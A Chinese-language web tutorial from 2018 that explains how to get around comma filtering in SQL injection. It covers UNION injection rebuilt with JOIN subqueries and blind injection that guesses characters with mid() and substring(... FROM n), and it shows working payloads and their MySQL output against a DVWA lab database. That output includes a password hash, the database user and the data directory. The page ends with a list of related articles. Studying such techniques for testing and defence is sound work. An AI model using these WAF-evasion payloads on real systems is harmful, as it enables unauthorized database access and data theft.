SQL注入技巧之显注与盲注中过滤逗号绕过详析

 更新时间:2018年08月19日 11:07:06   作者:晓枫v5  
SQL注入的绕过技巧有很多,下面这篇文章主要给大家介绍了关于SQL注入技巧之显注与盲注中过滤逗号绕过的相关资料,文中通过示例代码介绍的非常详细,需要的朋友们下面随着小编来一起学习学习吧

前言

sql注入在很早很早以前是很常见的一个漏洞。后来随着安全水平的提高,sql注入已经很少能够看到了。但是就在今天,还有很多网站带着sql注入漏洞在运行。下面这篇文章主要介绍了关于SQL注入逗号绕过的相关内容,分享出来供大家参考学习,下面话不多说了,来一起看看详细的介绍吧

1.联合查询显注绕过逗号

在联合查询时使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,语句中包含了多个逗号,如果有WAF拦截了逗号时,我们的联合查询不能用了。

绕过

在显示位上替换为常见的注入变量或其它语句

union select 1,2,3;

union select * from ((select 1)A join (select 2)B join (select 3)C);

union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);

在数据库中演示联合查询

UNION开始是我们在URL中注入的语句,这里只是演示,在实际中如果我们在注入语句中有逗号就可能被拦截

mysql> select user_id,user,password from users union select 1,2,3;
+---------+-------+----------------------------------+
| user_id | user | password  |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 1 | 2 | 3  |
+---------+-------+----------------------------------+
2 rows in set (0.04 sec)

不出现逗号,使用Join来注入

mysql> select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select 3)C);
+---------+-------+----------------------------------+
| user_id | user | password  |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 1 | 2 | 3  |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)

查询我们想要的数据

mysql> select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);;
+---------+-------+-------------------------------------------------+
| user_id | user | password   |
+---------+-------+-------------------------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 1 | 2 | root@192.168.228.1 dvwa c:\phpStudy\MySQL\data\ |
+---------+-------+-------------------------------------------------+
2 rows in set (0.08 sec)

2.盲注中逗号绕过

MID 和substr 函数用于从文本字段中提取字符

mysql> select mid(user(),1,2);
+-----------------+
| mid(user(),1,2) |
+-----------------+
| ro |
+-----------------+
1 row in set (0.04 sec)

查询数据库用户名第一个字符的ascii码

mysql> select user_id,user,password from users union select ascii(mid(user(),1,2)),2,3;
+---------+-------+----------------------------------+
| user_id | user | password  |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 114 | 2 | 3  |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)

盲注,通过猜ascii值

mysql> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=115) ;
Empty set

mysql> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=114) ;
+---------+-------+----------------------------------+
| user_id | user | password  |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.04 sec)

逗号绕过SUBTTRING 函数

substring(str FROM pos)

从字符串str的起始位置pos 返回一个子串

mysql> select substring('hello' from 1);
+---------------------------+
| substring('hello' from 1) |
+---------------------------+
| hello  |
+---------------------------+
1 row in set (0.04 sec)

mysql> select substring('hello' from 2);
+---------------------------+
| substring('hello' from 2) |
+---------------------------+
| ello  |
+---------------------------+
1 row in set (0.03 sec)

注入

mysql> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=114) ;
Empty set
//substring(user() from 2)为o
//o的ascii为111,
mysql> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=111) ;
+---------+-------+----------------------------------+
| user_id | user | password  |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.03 sec)

总结

以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,如果有疑问大家可以留言交流,谢谢大家对脚本之家的支持。

相关文章

  • 详解Unique SQL原理和应用

    详解Unique SQL原理和应用

    以一定的算法结合解析树中的各结点,计算出来一个整数值,用来唯一标识这一类SQL,这个整数值被称为Unique SQL ID,Unique SQL ID相同的SQL语句属于同一个“Unique SQL”。
    2021-05-05
  • SQL server 2005的表分区

    SQL server 2005的表分区

    SQL server 2005的表分区...
    2006-12-12
  • 收缩数据库不变小的解决方法

    收缩数据库不变小的解决方法

    收缩数据库不变小的解决方法。
    2009-11-11
  • 实例介绍SQL注入以及如何解决

    实例介绍SQL注入以及如何解决

    这篇文章主要给大家介绍了关于SQL注入以及如何解决的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
    2021-01-01
  • SQL注入之基于布尔的盲注详解

    SQL注入之基于布尔的盲注详解

    首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔的盲注。下面来一起看看吧。
    2016-09-09
  • PowerDesigner数据库建模使用详细教程

    PowerDesigner数据库建模使用详细教程

    这篇文章主要介绍了PowerDesigner 数据库建模使用详解,利用PowerDesigner可以制作数据流程图、概念数据模型、物理数据模型、面向对象模型,使用PowerDesigner可以帮助开发者快速的完成数据库建模相关的工作,从而助力提升整个软件项目的开发效率,需要的朋友可以参考下
    2023-07-07
  • [数据库] 通用分页存储过程

    [数据库] 通用分页存储过程

    [数据库] 通用分页存储过程...
    2007-02-02
  • sql语句创建外键关联的完整实例

    sql语句创建外键关联的完整实例

    这篇文章主要给大家介绍了关于sql语句创建外键关联的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
    2021-03-03
  • SQL SERVER 与ACCESS、EXCEL的数据转换

    SQL SERVER 与ACCESS、EXCEL的数据转换

    SQL SERVER 与ACCESS、EXCEL的数据转换...
    2007-02-02
  • 海量数据库的查询优化及分页算法方案集合1/2

    海量数据库的查询优化及分页算法方案集合1/2

    海量数据库的查询优化及分页算法方案集合1/2...
    2007-03-03

最新评论